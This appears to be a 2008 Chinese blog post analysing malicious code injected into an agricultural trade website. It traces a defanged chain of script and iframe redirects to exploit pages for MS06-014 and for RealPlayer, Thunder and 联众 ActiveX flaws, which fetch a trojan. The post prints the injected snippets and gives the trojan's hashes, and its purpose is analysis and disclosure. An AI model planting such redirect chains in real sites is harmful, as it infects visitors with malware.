某农业产品贸易网挂马Trojan.DL.Win32.Mnless.bes/Trojan-Dropper.Win32.Agent.xdu

最新推荐文章于 2024-04-22 15:28:53 发布
最新推荐文章于 2024-04-22 15:28:53 发布
阅读量1k 收藏
点赞数
分类专栏: 系统安全 文章标签: 农业 产品 iframe javascript flash border
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/Purpleendurer/article/details/2997049
版权

某农业产品贸易网挂马Trojan.DL.Win32.Mnless.bes/Trojan-Dropper.Win32.Agent.xdu

 

endurer 原创
2008-09-29 第1

 

发现了挺久了,不过现在才有时间来分析一下。

 

该网页面发现代码:
/---
<script language="javascript" type="text/javascript" src="hxxp://a*lim*o*ma*.com/header_bg.gif"></script>
---/

#1 hxxp://a*lim*o*ma*.com/header_bg.gif 包含代码:
/---
document.write("<iframe src=hxxp://www.*eq**w0**06.cn/zzll/1.htm width=50 height=0 border=0></iframe>");}
---/


#1.1 hxxp://www.*eq**w0**06.cn/zzll/1.htm 包含代码:
/---
<Iframe src="hxxp://max**-**7*.cn/a154/fxx.htm" width=100 height=0></Iframe>
---/


#1.1.1 hxxp://max**-**7*.cn/a154/fxx.htm

 

会引用如下网页:

 

#1.1.1.1 hxxp://max**-**7*.cn/a154/fx.htm
检查用户浏览器类型,如果是MSIE,则输出代码:

/---
<iFrame src=ilink.html width=100 height=0></iframe>
---/

否则输出:

/---
<iframe src=flink.html width=100 height=0></iframe>
---/

 

#1.1.1.1.1 hxxp://max**-**7*.cn/a154/ilink.html
检查flash插件版本,并相应的下载:i115.swf、i45.swf、i16.swf、i64.swf、i28.swf、i47.swf。

 

#1.1.1.1.2 hxxp://max**-**7*.cn/a154/flink.html
检查flash插件版本,并相应的下载:f115.swf、f64.swf、f47.swf、f45.swf、f28.swf、f16.swf。


#1.1.1.2 hxxp://max**-**7*.cn/a154/ss.html
/---
文件不存在
---/

 

#1.1.1.3 hxxp://max**-**7*.cn/a154/ms06014.htm

利用ms06-014漏洞下载hxxp://www.zmjjjyy.cn/new/a154.css


文件说明符 : E:/test/a154.css
属性 : A---
数字签名:否
PE文件:是
获取文件版本信息大小失败!
创建时间 : 2008-9-25 12:6:20
修改时间 : 2008-9-25 12:11:48
大小 : 12113 字节 11.849 KB
MD5 : be60b3827121531748a25cf644e8668b
SHA1: A5FF6B8DECA69227CB6F70D7FEE2E7D111DF6365
CRC32: 8fbfd7c7

 

卡巴斯基报为:Trojan-Dropper.Win32.Agent.xdu,瑞星报为:Trojan.DL.Win32.Mnless.bes

 

#1.1.1.4 hxxp://max**-**7*.cn/a154/GLWORLD.html

利用联众世界(clsid:61F5C358-60FB-4A23-A312-D2B556620F20)漏洞下载hxxp://www.zmjjjyy.cn/new/a154.css

 

#1.1.1.5 hxxp://max**-**7*.cn/a154/sina.htm
/---
文件不存在
---/

 

#1.1.1.6 hxxp://max**-**7*.cn/a154/UU.htm
/---
文件不存在
---/

 

#1.1.1.7 hxxp://max**-**7*.cn/a154/Thunder.html

利用迅雷(clsid:F3E70CEA-956E-49CC-B444-73AFE593AD7F)漏洞下载hxxp://www.zmjjjyy.cn/new/a154.css

 

#1.1.1.8 hxxp://max**-**7*.cn/a154/real.htm

利用RealPlayer(IERPCtl.IERPCtl.1)漏洞下载hxxp://www.zmjjjyy.cn/new/a154.css
不攻击IE7

 

#1.1.1.9 hxxp://max**-**7*.cn/a154/Real.html

利用RealPlayer(clsid:CFCDAA03-8BE4-11CF-B84B-0020AFBBCCFA)漏洞下载hxxp://www.zmjjjyy.cn/new/a154.css

紫郢剑侠
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
清理特洛伊木马——Trojan:Win32/Vigorf.A
m0_59302403的博客
01-25 1758
常规方法、无门槛清理特洛伊木马,只限于Trojan:Win32/Vigorf.A。
JavaScript 高性能编程 —— Data Access 数据访问
cccloveforever的博客
04-20 1423
经典计算机科学的一个问题是确定数据应当存放在什么地方,以实现最佳的读写效率。数据存储在哪里, 关系到代码运行期间数据被检索到的速度。在 JavaScript 中,此问题相对简单,因为数据存储只有少量方 式可供选择。正如其他语言那样,数据存储位置关系到访问速度。每一种数据存储位置都具有特定的读写操作负担。大多数情况下,对一个直接量和一个局部变量数据访 问的性能差异是微不足道的。访问数组项和对象成员的代价要高一些,具体高多少,很大程度上依赖于浏 览器。
Trojan.Win32.Scar.cjdy分析
chasdmeng的专栏
09-29 3313
前记:         这是很早之前分析的一个windows上的病毒程序,程序很有代表性,我当时分析的也很细致。最近在整理文档时发现了它,感觉还是有分享的价值的。 一、病毒标签: 病毒名称:Trojan.Win32.Scar.cjdy 病毒类型:下载类、感染型程序 文件 MD5:2EFC5A7D29B43AD8B0C02047AF7B4ED5 公开范围:完全公开 危害等级:3
Unix.Trojan.Agent-37008木马查杀
carry的博客
11-12 2151
最近一天突然发现公司网络出问题了,时不时就断网,起初行政部门联系网络运营商,以为是他们那边的网络故障,而且刚开始运营商说是光猫可能出故障了,已经在给我们安排发一个新的过来。光猫还没收到,宽带管理人员发现光猫被内网发出的大量数据给卡死的,让我们排查一下内网设备。 于是我们赶紧登录路由查日志,发现路由也会被卡死,在某一段时间内突然发送大量数据到某个IP地址。第一反应是内网机器中毒了,一排查发现是从gitlab服务器发出去的。正好这台服务器平常是我来管理,这下解决这个问题成了我一个人的事,头大。。。 于此
关于桌面程序被安全软件误判为HEUR:Trojan.Win32.Generic的解决方案
10年职场两茫茫,35岁凄凉奈若何
06-29 5023
关于桌面程序被安全软件误判为HEUR:Trojan.Win32.Generic的解决方案
2020年trojan最新windows64客户端trojan-1.15.1-win.zip
04-14
2020年trojan最新windows64客户端
osx.raedbot.rar_At Risk_OSX.Raedb_linux trojan_realbasic_xraed
09-21
Cross-Platform worm-trojan (Win32 , Linux and Mac OS ) source in REALBasic , At your OWN risk .
trojan-1.16.0-win.zip
04-01
trojan
Trojan-Qt5-Windows.zip
03-14
V0.0.4c The Emergency Bug Fix for V0.0.4b V0.0.4b的紧急Bug修复 @TheWanderingCoel TheWanderingCoel released this 3 hours ago This is a version only contain these bug fixes: [Bug Fix] Fix Safari ...
JEECG表格选中状态怎么去掉
weixin_39031037的博客
04-19 435
官网代码(在取消选中状态的时候不生效)
Storage 工具如何封装(前缀、加密、过期时间等)及localStorage的基础介绍
qq_43641110的博客
04-18 1038
​​​​​​​。
一个小时学习javaScript
weixin_43064364的博客
04-20 795
JavaScript 是一种广泛使用的编程语言,最初被设计来增加网页的交互性,让用户能够与网页上的元素进行互动。自从1995年被引入以来,JavaScript已经发展成为Web开发中不可或缺的一部分,并且其用途已经大大扩展到了网页之外。
Vue.js(自定义指令)
Luo3255069063的博客
04-18 433
【代码】Vue.js(自定义指令)
PLSQL的下载与安装
code袁的博客
04-18 524
🦁作者简介:一名喜欢分享和记录学习的在校大学生💥个人主页code袁💥个人QQ🐯个人wechat:code8896凭借其语法突出显示、SQL和PL/SQL帮助、对象描述、代码助手、编译器提示、重构、PL/SQL美化器、代码内容、代码层次结构、代码折叠、超链接导航、宏库和许多其他复杂功能,Unicode兼容编辑器甚至会吸引最苛刻的用户。手动码字,如有错误,欢迎在评论区指正💬~你的支持就是我更新的最大动力💪~
vue 实现级联选择器功能
最新发布
清音的博客
04-22 377
数组包含了级联选择器的数据源,其中每个对象表示一个选项,包括。组件来实现级联选择器功能,下面是一个示例代码,演示如何使用。组件初始化级联选择器,并设置默认值为单位。对象用于指定数据结构中的属性名,以便。上,可以在初始化时选中指定的值。使用 Element UI 的。中设置初始选中值为单位。组件正确地解析数据。
【可视化大屏开发】19. 加餐-百度地图API实现导航加线路热力图
pblh123的专栏
04-17 951
Web端使用场景中会涉及到地图导航路线情况,并利用热力图显示路况信息。实现效果如下:输入起始地点,选择并开始导航最终效果。
vue3【详解】 vue3 比 vue2 快的原因
朝阳39的博客
04-19 874
vue3使用的 Proxy 在处理属性的读取和写入时,比vue2使用的defineProperty 有更好的性能(速度加倍的同时,内存还能减半!
第一节 数据类型与结构
04-17 837
数据类型、类型检测
Trojan-Downloader.Win32.Agent.bbb 木马手动查杀
06-09
首先,关闭所有正在运行的程序,然后按照以下步骤手动查杀Trojan-Downloader.Win32.Agent.bbb木马: 1. 打开任务管理器,结束所有Trojan-Downloader.Win32.Agent.bbb木马相关进程。 2. 删除Trojan-Downloader.Win...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

紫郢剑侠

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值